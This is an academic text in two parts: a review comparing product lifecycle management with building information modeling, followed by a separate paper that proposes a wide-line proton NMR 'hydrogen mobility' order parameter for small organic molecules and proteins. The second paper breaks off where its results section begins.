Depending on the level of integration, implementation and system architecture, the deployed information systems may include: Systems engineering (SE), Product design, Product and portfolio management (PPM), Engineering data management (EDM), Manufacturing process management (MPM), PDM, Enterprise resource planning (ERP) and and supply chain management (SCM). To limit the scope of this discussion, our review utilizes Crnkovic's PLM integration taxonomy [13] to rationalize the information systems utilized. Crnkovic defines three levels of integration: full, loose and no integration.
Full Integration:
A package with all functions using common structures, data, user interfaces and application programming interfaces (APIs). The integration model has a layered architecture. The lowest tier is the data repository layer, which includes databases, file systems and information models [13]. The middle tier is the business layer, with tools and services to support business logic. The uppermost tier is the user interface layer. All layers are connected to each other using standardized APIs. A single database for all the data is superior in terms of data quality, because loss of data in exchange between systems is reduced and duplication is low [13].
Loose Integration: The different information systems operate more independently and store data in their own repositories. The information models in the repositories are different and can only be accessed from native tools. Information exchange between tools is carried out by additional interoperability functions. The advantage is that it does not require a common information model and enables the use of tools from different vendors. Disadvantages stem from the lack of a common information model, requiring interoperability functions, through middleware mechanisms acting as a 'middle layer' in PLM integration. Data inconsistencies pose a risk.
No Integration: All data transfers are done manually, increasing the risk of data inconsistencies, human error, and the lack of standardization in information models.
The data update routines such as import and export functions need to be well defined.
Effects
As companies use PLM in different ways, the extent of its effects is contingent on the field of business and level of integration. The business case for PLM is usually linked to the reduction of operational level information systems and an increase in operational excellence [10]. Manufacturers can speed up the realization of complex products. Product engineers can shorten implementation and engineering change approval cycles across the extended design team. Purchasing agents can work more effectively with suppliers to reuse parts. Executives get a high-level view of all important information, from details of the manufacturing line to parts failure rates culled from warranty data and field information [14]. The effects of PLM may also include staff reduction, data integration, standardization, access to timely and complete information, improving customer service, creative and collaborative work methods; customization of products based on complex customer desires, lead-time reduction, prototype cost reduction, and reduction in late product changes [10]. PLM centres on the BOM (bill of materials), with methods, processes and legacy tools needing to be modular, follow standards and be reusable [11]. PLM integration must be flexible to react to changes in the market, organization structure, business processes, product and tools. Consequently data, processes and software should ideally be aggregated to reduce system complexity [15] There are ongoing efforts to make STEP universally available using XML and UML standards. MIMOSA's OSA-EAI (OSA for Enterprise Application Integration) and OSA-CBM (Open System Architecture for Condition Based Maintenance) are also established and utilised [16].
Criticisms
There are several unique challenges related to business process and technological integration relative to the PLM concept, as documented in several case studies, see e.g., [10,14,15]. Many criticisms of PLM can be traced to: (a) failings in PLM technology; (b) 'elusive standard engineering processes' as the foundation for PLM; (c) organizational issues; and (d) dynamic environments.
Failings of PLM Technology: PLM solutions lack maturity; this is mostly due to high levels of technical complexity and incomplete data standards. Whilst PLM's functional footprint is improving, it is common to require multiple proprietary solutions to address each company's needs spanning the development lifecycle. PLM solutions are typically a complex collection of tools that are often loosely connected [15]. Depending on the overall architecture, the functionalities of systems and tools used might overlap causing redundancies, rework and data quality deterioration. Also, data standards and corporation-wide integration architectures are ongoing development activities and are not fully established [10,15].
Elusive Standard Engineering Process: Whilst the development process may be viewed as standard across product groups and businesses, once details of how a company actually develops a product (how decisions are made, who is involved at various stages, how partner collaborations are executed, etc.), the nuances of a company's product development practices become visible [15]. The practices of seemingly similar product development and engineering processes can differ wildly across companies and between products developed in the same company.
Organizational Issues: Due to the diversity of engineering tools and subsystems there is a tendency to delegate PLM deployment to engineering executives, who traditionally manage technology rollouts [15]. This approach works for choosing point solutions, e.g., CAD tools, but studies show that it does not work well for enterprise-wide integration platforms [14,15]. The main criticism being that different business functions generate and deal with product data in disparate ways. Related criticisms include: improper executive management expectations, frustrated endusers, high implementation costs, and evasive returns on investment [15].
Dynamic Environments:
The systems and practices that underlie lifecycle management are continuing to undergo significant changes. New and emerging IT, rapid globalization of businesses, and evolving core functions such as collaborative design and outsourced manufacturing force companies to continually re-examine their product development practices, which can be costly and time consuming [6,10].
Building Information Modeling
BIM is an object oriented approach to creating, managing and using various geometric and non-geometric data in a construction project. While conceptually BIM can be used across all the phases of a project lifecycle, starting from design to the demolition of the built environment, in practice, the level of integration and maturity of BIM usage across different phases is contingent on multiple factors defined relative to products (both the design artefact and tools), processes (e.g. operational, methodological, business, legal) and people (e.g. organizations, stakeholders, culture).
Concept and Methods
The evolution of BIM can be traced to simultaneous developments across CAD and information systems; both facilitated by progress in computing power, the emergence personal computers and the internet. The development of the BIM concept and methodology can be explained on the basis of four attributes: 1) representation, 2) information management, 3) inbuilt intelligence, analysis and simulation, and 4) workflow management. Representation is integral to design, and it has driven the development of BIM in at least two ways. Firstly in terms of design cognition; as processing capabilities improved, computational tools moved from 2D drafting to 3D models, making visualization and working with complex geometries possible. This move from symbolism to virtualization initially led to photo-realistic renderings (based on solid geometry) and later to intelligent object-oriented models (replacing solid geometry). Second, at the level of communication and collaboration; representations used across multidisciplinary design teams demand greater specification of easily comprehended and disambiguated information. This requires higher levels of detail and accuracy in the geometric and non-geometric information contained in object-based models.
While representation and visualization is also part of documenting project-related information, it is equally important to be able to record, manage and use all other forms of building-related data, information and knowledge generated across the project lifecycle. Accordingly, document and information management capabilities that were developed in pre-BIM tools (as an independent set of specifications, documents and spreadsheets), have merged and evolved with BIM applications as information that is typically embedded, appended or linked to object-based models. Linking between all forms of geometric and non-geometric data is a critical aspect of BIM. Consequently, traditional users of electronic document management systemssuch as contractors and project managers -have the expectation that BIM provides similar information management capabilities, with the added advantage of visualization. In construction, this typically takes the form of a BIM model server (see [17] for a discussion). Depending on the level of BIM implementation and maturity these systems may or may not be enabled in the project environment.
The object-oriented premise of BIM enables integration of CAD and information management capabilities. In doing so, it is possible to intelligently link different objects with relationships and constraints, allowing various forms of automated analysis and simulation, ranging from environmental and structural analysis to cost estimating and construction scheduling. Various forms of building compliance 'checks', such as interference and clash detection, are now common. Increasingly, BIM applications are becoming knowledge-based systems with more and more domain knowledge being integrated. Consequently, the number of BIM applications is expanding rapidly, each catering to different discipline-based requirements.
With the complexity, intelligence and number of BIM applications growing, information and workflow management is critical. Given the richness of buildingrelated and project-related information it is desirable to design and plan the project and discipline-specific workflows. Design process optimization is receiving growing attention in recent efforts to model information flow and develop BIM workflow management frameworks, leading to new cloud-based approaches (see e.g., [19]).
Information Systems and Technologies
BIM shares many characteristics with PLM. The platforms supporting BIM resemble Crnkovic's [14] loose or no integration levels. Technologically, some of the key characteristics of BIM are: 1) Open data standards, 2) Centralised and decentralised BIM, 3) Information exchange standards, and 4) Data and information structures. To achieve interoperability between BIM applications, open file formats such as the Industry Foundation Class (IFC) have been developed. IFC files can be viewed in most applications but modifications have to be undertaken in the native format and converted back to IFC. This process is error prone. Even if most geometric data can be completely exchanged, the intelligence is often lost in the transformation. Another information exchange method is sharing data through middleware or APIs, however this requires that different links are established between each application.
The BIM database can either be centralized or decentralized. In a centralized approach, information from e.g., a central IFC-based model must be exported, modified within a native format and imported back into the central model using IFCs. This 'roundtrip' is often not a viable option due to interoperability issues [20]. Singh et al. [17] highlight the challenges of system and sub-system integration in a centralized BIM-server approach. Due to this complexity, a decentralized, distributed information management approach is increasingly being considered [20]. In a decentralized approach, collaboration can occur at two levels: (1) within a single organisation or discipline using similar tools, and (2) across different disciplinespecific models shared and combined using IFCs. IFC standardization has adopted a 'use case centred' approach [21]. Different use cases and information exchange requirements are specified in Information Delivery Manuals (IDM). IDMs together with other model management protocols have given rise to a variety of policy documents such as BIM Management, Coordination and Execution Plans [22].
Object-based building models include both non-modifiable internal data structures, and information structures that enable model management. NBIMS (National BIM Society) lists three potential reference standards that can be used to structure model information; IFC, as discussed above, the Construction Specifications Institute (CSI) OmniClassTM, and CSI IFDLibrary [23]. OmniClass provides a standardized basis for classifying information created and used by the North American AEC (Architectural, Engineering and Construction) industry. The IFD initiative, based on ISO standards and driven by buildingSMART, aims to find a way to create and catalogue a data dictionary of building objects and bring disparate sets of data into a common view of the construction project or asset. In addition to reference standards, a variety of metadata is also contained in the BIM model, e.g., information related to object creation and history. A recent development in BIM systems is towards distributed transactional models, e.g. the DRUM concept [20], which aims to create a mechanism to manage linked partial models such that building information can still be distributed.
Effects
Effects of BIM are visible both at micro (project and organization) and macro (industry and national) levels. The potential benefits of BIM are best exploited through collaborative engagement of different stakeholders from early stages of the project. Accordingly, new forms of project delivery practices are emerging such as Integrated Project Delivery (IPD) -an alliance-based relational contracting approach that aims to align the interests, benefits, roles, risks and responsibilities of all project stakeholder [24]; Big Room -a multidisciplinary BIM coordination office [25]; and 'knotworking' -occasional collocated and intense design sessions when distributed design teams physically get together to make rapid progress [26]. Furthermore, with increasing BIM maturity, its role and scope is expanding to different aspects and domains across the building lifecycle and specific topics for BIM, such as BIM for: facilities and operations management, lean construction, prefabrication, and safety. At a macro level governments across many countries are mandating the use of BIM to facilitate productivity gains in the AEC sector. Among the various challenges in realizing these mandates is training enough BIM skilled and literate personnel.
Criticisms
BIM has received criticism on various issues, especially concerning, (1) data transfer and systems integration, (2) ill-defined terminology, scope and purpose, and (3) unstructured implementation processes.
Data Transfer and System Integration:
There are gaps in using BIM smoothly between conceptual design to detail design, design model to construction model, as-designed to as-built data, etc. These interfaces need to be resolved for effective BIM usage. Also, the integration of BIM with advanced structural analyses techniques such as Finite Element Method has remained a challenge. While open standards have progressed significantly over the last two decades, the commercial interests of software vendors have also stunted the pace of development around interoperability.
Terminology, Scope and Purpose: The term and concept of BIM is unclear for many, with M in BIM being used interchangeably for models (product), modelling (process), and management (process). This needs to be resolved for stakeholders to reach a shared understanding on what they are committing to. Furthermore, the scope and purpose of BIM in a project is rarely defined clearly, leaving uncertainties about aspects such as the level of detail, information flow and modes of exchange of information across stakeholders, data transfer, model ownership and handover.
Unstructured Implementation Processes:
One of the primary challenges to addressing macro level issues is to understand and plan around the key factors that drive and determine how and where BIM efforts are concentrated. For example, in Finland, the earliest BIM developments that were piloted in 1994, focused on later lifecycle management [27]. However, as the pilot project led to greater interest in BIM, direct and immediate benefits were seen by design consultants and contractors. The resulting market forces led to BIM development concentrating on design and construction phases, while work in facilities and later lifecycle management came to a standstill. In recent years this development is seeing a revival, e.g., developments have looked to establish definition of as-built datasets for FM [28], and the introduction of the COBie initiative (Construction Operations Building information exchange) for the exchange of IFC-based FM data [29].
Discussion
PLM and BIM share some similarities regarding lifecycle management objectives and the nature of their practice-based criticisms, however they differ in critical areas concerning their underlying methods, scope of business, technological and enterprise integration, and their intended effects. This sections attempts to elucidate these similarities and distinctions so that valuable learning opportunities may be identified. Similarities exist in the key objectives of PLM and BIM, which include functionalities that support and manage the creation, release, change and verification of product-related information. PLM and BIM platforms typically provide for the same core functions: management of design and process documents and models, development and control of BOM records, provision of electronic file repositories, inclusion of document and model metadata, identification of model content for compliance and verification, provision for workflow and process management for change approvals, control of multi-user secured access, and data export controls. However it should also be noted that whilst BIM platforms have designed to cover these areas, their level of IT maturity and process sophistication appears to be behind that of most PLM system architectures.
Like PLM, BIM aims to integrate people and data processes throughout the design, construction and operation of a product (or built asset). However it has only been in the last five to seven years that an increasing focus on the application of BIM throughout the whole building lifecycle has emerged and the significance of business systems and business process integration been acknowledged. The literature surveyed reveals a growing number of studies that consider a range of building lifecycle management issues, where much of this research has sought to bridge the interface between AEC processes and the activities of facility operations and management. BIM servers are now being developed to provide a large integrated data-and knowledge-base that can be leveraged not only in design and engineering but also in planning and management of component fabrication, construction operations, and facilities maintenance [30]. Thus research efforts to 'close the loop' and develop the BIM concept for business process integration for the whole building lifecycle are increasing. This increasing scope, functionality and value of BIM is a consequence of platform expansion targeting collaborative processes, shared resources and decisionmaking to support the whole lifecycle [4].
The adoption of a lifecycle perspective in any sector depends on multiple factors. Depending on the size, cost and complexity of an engineered product or built asset the design and production will normally adhere to discrete stages to form a system lifecycle. In construction, IT implementations that span project or life cycle stages are less established than in manufacturing sectors such as aerospace. The speed and breadth of adoption of IT across the extended enterprise is also greater in these sectors. PLM in manufacturing is therefore a more proven lifecycle integration solution. In construction, even despite BIM-enabled IPD approaches, the flow and management of information is still not fully integrated among all stakeholders. In developing and advancing the BIM concept it is therefore imperative to adopt an ecosystem approach to mapping the network of interacting AEC actors, corporate business processes, project processes, activities, methods and technologies. | 2018-04-03T04:34:21.793Z | 2014-07-07T00:00:00.000 | {
"year": 2014,
"sha1": "460244a96e40568e19100131c61d89bac2b4dfb0",
"oa_license": "CCBY",
"oa_url": "https://hal.inria.fr/hal-01386473/file/978-3-662-45937-9_4_Chapter.pdf",
"oa_status": "GREEN",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "3eb22248fc3bc7bcaac7812af65e934b04d80b23",
"s2fieldsofstudy": [
"Computer Science"
],
"extfieldsofstudy": [
"Engineering",
"Computer Science"
]
} |
12007111 | pes2o/s2orc | v3-fos-license | Hydrogen skeleton, mobility and protein architecture
The mobility of the proton-proton radial vectors is introduced as a quantitative measure for the structural dynamics of organic materials, especially protein molecules. As defined for the entire molecule, the hydrogen mobility (HM) is proposed as an “order parameter,” which describes the effect of motional narrowing on inter-proton dipole-dipole interactions. HM satisfies all requirements of an order parameter in the Landau molecular field theory of phase transitions. The wide-line NMR second moments needed to obtain HM are exactly defined and measurable physical quantities, which are not produced by mathematical fitting and do not carry the limitations and restrictions of any model (theoretical formalism). We first demonstrate the usefulness of HM on small organic molecules with data taken form the literature. We outline its link with structural and functional characteristics on a range of proteins: HM provides a model-free parameter based on first principles that can clearly distinguish between globular and intrinsically disordered proteins, and can also provide insight into the behavior of disease-related mutants.
Introduction
The importance of the dynamic nature of protein molecules cannot be overestimated: understanding their function in its entirety cannot be achieved by considering them as rigid molecules. Their dynamic state is affected by their thermal and chemical surroundings. The limitations of information inherent in the applied experimental method(s) also cannot be neglected. Beyond the general and conceptual question of motion (to the effect as it is detailed in Appendix A), the identification and proportion of mobile parts (residues), the physical characteristics of their motion and the effect of mobility on their reactivity/function all require special attention.
Addressing mobility is motivated by works approaching this subject from different angles. Halle criticized experimental approaches and results on aqueous protein solutions, by stating that "the progress is less and erratic and the results given by different experimental methods are contradictory and more or less model dependent in the interpretation" 1 . Saito and Kobayashi examined carefully the physical basis of protein architecture. 2 Wlodawer and colleagues discussed the limitations of structural information obtained by X-ray crystallography. 3 They emphasized the lack of direct determination of hydrogen positions, which suggests the role of proton magnetic resonance experiments to complement such measurements very effectively. The regular and generally used NMR procedures were summarized e.g., by Dyson and Wright, with particular focus on intrinsically disordered proteins, 4 by Duer in the case of studying molecular motions in solids, 5 by Antzutkin in molecular structure determination in biology, 6 and by Smith in the case of studying protein structures. 7 The change in protein structural paradigm from order to disorder (from globular to intrinsically disordered (ID) proteins) was discussed in reference 8. Realizing the limitations of all approaches applied to date, we would like to add a novel wide-line NMR approach to complement the usual set of methods; the experimental analyses (including wide-line NMR) of the IDPs were introduced earlier in references 9 and 10.
Our experimental approach relies on wide-line NMR spectrometry, as we seek global, non-selective information. The elementary probe we use is the atomic nucleus of hydrogen (the proton magnetic dipolar moment) residing in the protein molecules. The relevant variants of wide-line NMR spectrometry are detailed in the book chapters 12 in reference 9, and 13 in reference 10. The wide-line spectrum and its even moments, especially the second moment (a main indicator of internal motion in solids; see Appendix B) are used here as a first step. In prior works, we outlined the physical basis of the applied method and detailed the evaluation and interpretation protocols. The key factor in our approach is the hydrogen mobility (i.e., the time dependence of proton-proton radial vectors), which is indicative The mobility of the proton-proton radial vectors is introduced as a quantitative measure for the structural dynamics of organic materials, especially protein molecules. as defined for the entire molecule, the hydrogen mobility (HM) is proposed as an "order parameter", which describes the effect of motional narrowing on inter-proton dipole-dipole interactions. HM satisfies all requirements of an order parameter in the Landau molecular field theory of phase transitions. The wide-line NMR second moments needed to obtain HM are exactly defined and measurable physical quantities, which are not produced by mathematical fitting and do not carry the limitations and restrictions of any model (theoretical formalism). We first demonstrate the usefulness of HM on small organic molecules with data taken form the literature. We outline its link with structural and functional characteristics on a range of proteins: HM provides a model-free parameter based on first principles that can clearly distinguish between globular and intrinsically disordered proteins, and can also provide insight into the behavior of disease-related mutants.
of NMR-visible motions and not the high-frequency lattice vibrations. This hydrogen mobility introduced depends on the molecular structure, temperature, and also on the chemical environment in the case of solutions.
In the paper, we describe in detail the theoretical basis of the second moment of the NMR spectrum. We first consider the case of a rigid lattice; the motional narrowing is treated subsequently. We give the definition of the novel order parameter we term hydrogen mobility, and put it into the context of order parameters in general. We then review the experimental second moment data found in the literature for several organic compounds and we calculate the corresponding hydrogen mobility values. We test and give reasons for the application of the hydrogen mobility. Based on experimental data, we calculate the hydrogen mobility factors for some selected proteins, and discuss the importance of hydrogen mobility as a global, modelfree order parameter in describing function-related features of flexibility of proteins.
Rigid lattice
This section is prefaced with the remark that there is no analytical description of the spectra of multi-spin systems (e.g., molecules made of numerous atomic nuclei of various types). The series expansion technique can be used 11,12 to obtain a moments expansion of the time-domain NMR-signal (FID or solid echo).
The magnetic dipolar interaction plays a key role in the wide-line spectroscopy of solids. The magnitudes (or lengths) of the vectors connecting the interacting nuclei and their directions with respect to the external magnetic field directly determine the architecture (geometrical arrangement, structure or topology) of the nuclear spin system. This is the reason why the direct measurement of dipolar interactions is essential for describing the structure of proteins. The basic quantum theory of the dipolar interaction and properties of the NMR spectrum was given by Van Vleck in his Nobel laureate work. 13 Determining the second moments is viewed as a first step, used subsequently to characterize the rigid lattice and the internal motions of molecules.
To understand the NMR characteristics, the wide-line NMR spectrum and the even moments, and to lay the groundwork for planning and interpreting the experiments, we invoke short parts from Abragam's (chapters IV and X, ref. 14) and Slichter where γ is the gyromagnetic ratio, μ 0 is the magnetic constant, N is the number of nuclei, r jk is the magnitude of the vector connecting the i th and j th nuclei, θ jk is the angle between the internuclear vector r jk and the time independent magnetic induction vector B 0 , and the double summation means averaging over all the spins and all the neighbors. If all the resonant spins are located in equivalent positions, the double summation is reduced to a single one, being independent from one of the indices. There are then N equivalent sums, one for each value of j. The second moment is (2) in that case. (We have to emphasize that it is not the case with protons in proteins, in spite of the general claim in some papers.) Each term in Eqs. 1 and 2 is clearly of the order of , where is the contribution of the k th spin to the local field at spin j. Equations 1 and 2 precisely define the local field, which enables one to compare an exactly defined theoretical quantity with the measured (experimental) value. The summation has a short range character because of the strong distance dependence of the term. It is also necessary to address what "equivalent positions" mean in general and especially in a protein molecule? "The equivalent arrangements of the non-zero nuclear magnets around the resonant nuclei" gives the answer. In our case, not all the protons are equivalent, and consequently, a few terms from one part of the double summation are to be used in the second moment calculation. How many? Decomposition of the components in the wide-line spectrum helps to estimate the number.
If, besides protons, there are also other nuclear species, they also contribute to the local fields and to the total second moment (the contribution is given in ref. 15 not necessary for us at this moment). In the case of proton resonance, the dipolar contributions of other nuclei (e.g., 13 C, 15 N, 17 O) are zero or negligible; this is not true for other species (e.g., 23 Na or 35 Cl).
As a consequence, the hydrogen nuclei (the protons) give the topological map of the immobile protein molecule and the rigid protein-water system (which we may term the hydrogen skeleton). The use of Eq. 1 or Eq. 2 gives the theoretical basis for controlling the topological construction of the hydrogen skeleton of our molecules. It is to be mentioned, again, that the arrangement of the hydrogen atoms is missing from the X-ray maps. 3 Both the length and direction of the r jk proton-proton vectors are given as structural elements in single crystals. Only the length of the proton-proton vector exists in a powder (polycrystalline or lyophilized) sample because of "space-averaging". The second moment then simply depends on the length (magnitude) of r jk . For interacting spin-pairs, the contribution to the second moment of the rigid lattice is The fourth moment is only used here as a control for the analytical form of the line shape in Chapter 4 (wide-line NMR spectra and second moments of proteins), i.e., the details are not cited, only the references 10, 12, and 13 are mentioned again. The important point for our treatment is that the ratio of the fourth moment to the second moment-square is 3 for a Gaussian line.
Motional narrowing
Observing the temperature dependence of the systems studied, the position of protons and the dipole-dipole interaction between the neighboring pairs will be time dependent. The second moments (Eqs. 1 and 2) will be time dependent by the r jk and θ jk quantities as a consequence of atomic motions. The phenomenon is known as motional narrowing 11,12 and the results are the narrowing of the NMR spectrum and reduced moments as a consequence of time averaging. For a spin pair, Abragam 14 and Slichter 15 following Andrew and Eades 16 gave the description of time averaging by rotation around a given axis (4) where γ jk is the angle between the radius vector r jk and the rotation axis. (If γ jk = 90°, the time-averaged reduced moment is the rigid-lattice value reduced by the factor of 4.) Equation 4 forms the basis of the magic-angle spinning (MAS) method, 17 in which the sample is spun physically at the angle γ jk = 54°44′ (cos 2 γ jk = 1/3) with respect to the direction of the magnetic field. This way, the reduced second moment takes zero value for each spin pair. When there are internal molecular motions, the averaging is done also over the possible γ jk angles, which does not result in zero value. The very simple reduction factor in Equation 4 is only valid for the intramolecular contribution to the second moment. The intermolecular contribution that results from interactions between spins that belong to different molecules is affected by the rotation in a more complicated way since both the distances between spins and the orientations of the spin-spin vectors change.
The two types of averaging, space-average and time-average, can be done for every topological and motional model. The summations (Eqs. 1-2) and several possible motions should be considered, not forgetting that the summation means that the individual contributions are added up. This procedure involves numerous assumptions about the topology and the motional states and, consequently, the results are model dependent. Instead, we chose to determine the second moments experimentally: both the reduced second moment and the rigid-lattice value can be measured. In the typical temperature-dependence of the NMR second moment, i.e., on the frequency of the internal motion, the decrease of the second moment occurs in a temperature range, the position and width of which depends on the material studied. 18 Order parameter An order parameter, which is characteristic of the motional state of the proton-proton pair, can be theoretically defined on the basis of Equations 1-4. This Hydrogen-Motional order parameter we intend to introduce, can be calculated by introducing the notation as (5) where M 2 (T ) is the second moment measured at an arbitrary temperature T, M 2 (RL) is the second moment measured in the rigidlattice state at a sufficiently low temperature, and HM refers to the average mobility of the proton-proton vectors according to Equations 1-4. If the spectrum can be decomposed into e.g., two components as found in several cases, then two order parameters, i.e., two mobility values, can be measured. Equation 5 then takes the form (6) where x = t, b, n means the "total," "broad," and "narrow" spectral components, respectively. HM x is zero for an immobile (rigid/ordered) system and it is one for highly mobile (fluid-like) systems. The former state is probably realized at the temperature of liquid helium, whereas the latter one is only achieved above the melting point. There are two important points to be addressed: (1) What is the quantity to normalize with, i.e., what is the second moment of the rigid-lattice? (2) Which spectral component can be assigned to which part of the molecule? "Order" is connected with the time dependence or mobility of the proton spin (nuclear magnetic moment) as HM = 0 for a rigid system and HM = 1 for the liquid state; both these states and intermediate states can also be measured. In Appendix C, some considerations are given for the "order parameters" as defined through the Lipari-Szabo formalism of protein-solvent systems.
About order parameters in general
We have learned from the thermal properties of solids, e.g., in reference 19 and especially in the Landau mean-field theory of phase transition 20 that a large variety of systems can be described by a single, temperature-dependent order parameter. The system might be the magnetization in ferromagnets, the dielectric polarization in a ferroelectric system, the fraction of superconducting electron-pairs in a superconductor, the director distribution in nematic liquid crystals, 21 or the fraction of neighbor A-B bonds of the total bonds in an alloy AB or A 3 B. The physical quantity, which the order parameter refers to, is clearly given and its value must be between 0 and 1. The proposed HM(T ) satisfies these criteria.
Experimental Second Moment Data in the Literature and Estimated Hydrogen Mobility
To appreciate the insight and relevance of HM as an order parameter in describing proteins, first we look into relevant data in the literature on small organic compounds. These results are related to motions of small molecules and parts of molecules, which helps us familiarize ourselves with the relevant orders of magnitude. The HM(T ) values were calculated for cases where the second moment values were given at two temperatures at least.
The second moment measured for samples containing water of crystallization is M 2 ~28·10 −8 T 2 . 22 The expected second moment for groups is only M 2 ~3·10 −8 T 2 . 23,24 Works on the molecular motions detected in solid hydrocarbons [25][26][27] indicate the possible form of molecular motions, which range from torsional and rotational motions to translational diffusion. The second moment values measured for long-chain paraffins (n-C n H 2n+2 ) at T = 82-99 K can be considered as rigidlattice values with M 2 values given in Table 1; 25 these relevant spectra showed no fine structure. If the structure of a crystal is known and the lattice can be assumed rigid, the second moment of the proton resonance line can be calculated by applying the Van Vleck formula (Eq. 1). The crystal structure of n-C 29 H 60 was given among the results of X-ray investigations of a series of normal paraffins (n-C i H 2i+2 ; i = 6 -44). [28][29][30] Although X-ray diffraction cannot give the locations of the hydrogen atoms, it accurately measures the C-C bond lengths. The geometric positions of the hydrogen atoms (protons) were then determined by assuming tetrahedral symmetry for the C-H bonds and by using the spectroscopic C-H bond lengths. The long-chain paraffins n-octadecane (n-C 18 H 36 ), n-octacosane (n-C 28 H 58 ) and dicetyl (n-C 32 H 66 ) were investigated by continuous-wave NMR-spectroscopy. 25 25 The good agreement between the values measured and the ones calculated for n-octacosane and dicetyl proves the rigidity of the H skeleton, whereas the difference in the case of n-octadecane points to a small hydrogen mobility. The deviation from the two other paraffins is not surprising, because the lower melting point of n-octadecane also shows a looser crystal structure. The value of the HM mobility "order parameter" introduced here is 0.12.
Systematic investigations were done on benzene, by replacing H atoms partly with D (deuteron). The H-D change dilutes the magnetization of the H lattice, because of the much smaller nuclear moment of D, due to which its contribution to the second moment is approximately 2% of the proton magnetization. The great HM value ( Table 1) can be explained by the rotation around the hexad axis of the full proton system (H-skeleton), that is, by the rotation of the benzene molecule. HM is practically independent of the H/D ratio.
In the case of N,N-dimethylanilin, 31 the connection of the -N(CH 3 ) 2 group to the benzene ring gives an estimated rigid lattice value of M 2 = 18.4·10 −8 T 2 . The measured second moment is M 2 = 9.4…8.5·10 −8 T 2 in the temperature range of -190°C to 0°C, and it slowly decreases with increasing temperature, because of the lattice dilatation. The HM = 0.51 value is the consequence of the decrease of symmetry as compared that of the benzene. The actual value can be interpreted by the rotation of -CH 3 groups and by the immobility of benzene ring.
For urea, 32 the measured second moment is M 2 = 20.8·10 −8 T 2 at ~195 K and it is M 2 = 6.9·10 −8 T 2 at room temperature , and the hydrogen mobility estimated by us is HM = 0.87. The high value exhibits a molecular motion of high degree of symmetry, higher than that of the -NH 2 groups. Xylenes and mesitylene 33 give measured second moments of 9.8·10 −8 T 2 to 9.9·10 −8 T 2 at 95 K, which decrease upon heating to 205 K due to the lattice dilatation. The interpretation of the results is similar to that of the N,N-dimethylanilin, that is, rotation of methyl groups and the immobile benzene ring. The experimental work on hexamethylbenzene 34 is outstanding regarding that several NMR characteristics were measured between 2 K and 450 K. The solid-echo radiofrequency pulse combination was used for the second moment measurements. The X-ray structure is known and the calculated rigid lattice second moment is M 2 = 32.7·10 −8 T 2 . The measured second moments are 20·10 −8 T 2 to 14.5·10 −8 T 2 in the 2 K to 50 K range, they take the values of M 2 = 13.0·10 −8 T 2 at 90 K, and M 2 = 2.5·10 −8 T 2 above 210 K . The corresponding HM values are 0.60 and 0.98, respectively. The whole molecule rotates above 210 K. One of the surprising conclusions is that methyl groups are in a motional state at 2 K.
For the compounds 1,4-dicyclohexylcyclohexane, 25 cyclohexane 26 and adamantane (Bokor, M. et al., to be published), the results are summarized in Table 2. Isotropic (not uniaxial) rotation exists in the high symmetry cyclohexane and adamantane molecules in the solid phase.
The results for a few amino acids are also shown in Table 3. Amino acids are in zwitterionic form in the crystalline state. Rapid random reorientation of the -NH 3 and the -CH 3 groups in the solid amino acids were found above 150 K. 35,36 There are two motional processes manifesting themselves in the narrowing of the NMR spectra with increasing temperature. The second moments fall in two successive steps with temperature as the frequency of motion of each process becomes comparable with the spectral width.
A few generalizations are already apparent upon analyzing and comparing data on these organic compounds. Each molecule shows extensive internal mobility in the solid phase at room temperature. In many instances, the mobility of the H-H vectors can be as high as resulting in HM = 0.95. The mobile state exists also at lower temperatures, even at T = 4 K in some cases. The HM order parameter for the hydrogen mobility is a quantitative measure of the dynamic state, and it requires no model to be applied, in contrast with the second moment measured at a given temperature.
Wide-Line NMR Spectra and Second Moments of Proteins
Studies on small organic molecules and amino acids suggest that the order parameter introduced adequately captures the extent of hydrogen mobility, without invoking a model for interpreting experimental observations. Diakova et al. 37 studied the wide-line 1 H-NMR FID signals of dry and hydrated lysozyme powders. The FID of the hydrated protein powder was fitted to a sum of Gaussian functions (plus a constant at the highest water contents). It was found that the residual water at levels below 5 wt% is not rotationally mobile and the water-proton NMR signal is indistinguishable from the FID of the solid protein protons. The fast component of the FID was isolated and analyzed, which corresponds to the majority of the protein protons that do not experience significant dynamical averaging. These experiments infer that our approach might also be used for characterizing the general structural behavior of proteins.
To this end, we selected proteins that fall into two broad structural classes, ordered (folded) and intrinsically disordered (ID or ID protein, IDP), anticipating that IDPs show much more hydrogen mobility and much less order than folded ones. As a representative of ordered proteins, we chose lysozyme, the enzyme that has been amply studied for its structure, function and disease-causing mutations. 38 We then extended our studies on several IDPs which have already been characterized in much detail. Thymosin β4 is a small actin-regulatory protein, which has been shown experimentally to be highly disordered (Á. Tantos, et al., to be published 39 ). α-synuclein is also a fully disordered protein, 40,41 involved in Parkinson disease where it undergoes a transition to a highly structured amyloid state. Familial mutations (A30P, E46K, and A53T) promote this transition, possibly via altering the conformational equilibrium and structural flexibility of the protein. 40,41 ERD14 is a plant IDP of stress-related functions, 42,43 also shown to be highly disordered. Our goal here is to characterize these proteins in detail to determine their HM and correlate their behavior with their physiological function and relationship with disease. It is to be noted that some of our conclusions rely on preliminary results, and further experimental results we intend to publish in later detailed publications.
Methods Applied
The applied NMR measurement and evaluation methods were summarized in chapter 13 of reference 10. In addition to the generally used FID signals, solid-echo signals were also detected. Results for the entire temperature range covered (extended down to 4.2 K) are discussed in separate publications. The NMR signals detected in the time domain were analyzed and transformed to spectra similarly as it was described in reference 44. 1 H NMR measurements and data acquisition were accomplished by Bruker AVANCE III and Bruker SXP 4-100 NMR pulse spectrometers at ω 0 /2π = 82.4 MHz with a stability better than ± 10 −6 , and with 2 ppm inhomogeneity of the magnet. The temperature was controlled by an open-cycle Janis cryostat with a stability of ± 0.1°C, the uncertainty of the temperature scale was ± 1°C. The data points in the figures are based on spectra recorded by averaging signals to reach the signal/noise ratio 50.
The number of averaged NMR signals was varied to achieve the desired signal quality for each sample.
Results and Discussion
